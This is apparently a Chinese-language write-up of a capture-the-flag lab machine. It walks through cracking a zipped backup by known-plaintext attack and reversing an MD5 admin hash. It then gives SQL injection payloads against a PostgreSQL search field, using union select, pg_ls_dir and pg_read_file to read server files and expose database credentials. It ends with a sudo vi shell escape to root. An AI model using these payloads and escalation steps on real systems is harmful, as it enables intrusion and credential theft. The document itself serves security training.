前期工作
nmap扫描结果
破解zip压缩包
在ftp中存在备份文件
但是要密码,注意到压缩包中存在style.css
同时网站中也存在style.css,可以尝试进行已知明文攻击
注意在压缩style.css时要在linux上进行压缩,否则APCHPR会报错
获取root权限
见backup_decrypted
1
2
3
4
5
6
7
8
9
10
11
|
<!DOCTYPE html>
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>
...
|
2cb42f8734ea607eefed3b70af13bbd3反查结果为qwerty789
成功登录
报错ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%1'%' ^
?search=1%' union select null,version(),null,null,null--+确认数据库类型为PostgreSQL,PostgreSQL 11.7 (Ubuntu 11.7-0ubuntu0.19.10.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.2.1-9ubuntu2) 9.2.1 20191008, 64-bit
?search=1%' union select null,pg_ls_dir('/var/www/html'),null,null,null--+列出路径
?search=1%' union select null,pg_read_file('/var/www/html/dashboard.php', 0, 20000),null,null,null--+读取dashboard.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
<?php
session_start();
if ($_SESSION['login'] !== "true") {
header("Location: index.php");
die();
}
try {
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
} catch (exception $e) {
echo $e->getMessage();
}
if (isset($_REQUEST['search'])) {
$q = "Select * from cars where name ilike '%" . $_REQUEST["search"] . "%'";
$result = pg_query($conn, $q);
if (!$result) {
die(pg_last_error($conn));
}
while ($row = pg_fetch_array($result, NULL, PGSQL_NUM)) {
echo "
<tr>
<td class='lalign'>$row[1]</td>
<td>$row[2]</td>
<td>$row[3]</td>
<td>$row[4]</td>
</tr>";
}
} else {
$q = "Select * from cars";
$result = pg_query($conn, $q);
if (!$result) {
die(pg_last_error($conn));
}
while ($row = pg_fetch_array($result, NULL, PGSQL_NUM)) {
echo "
<tr>
<td class='lalign'>$row[1]</td>
<td>$row[2]</td>
<td>$row[3]</td>
<td>$row[4]</td>
</tr>";
}
}
?>
|
利用user=postgres password=P@s5w0rd!成功连接
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell
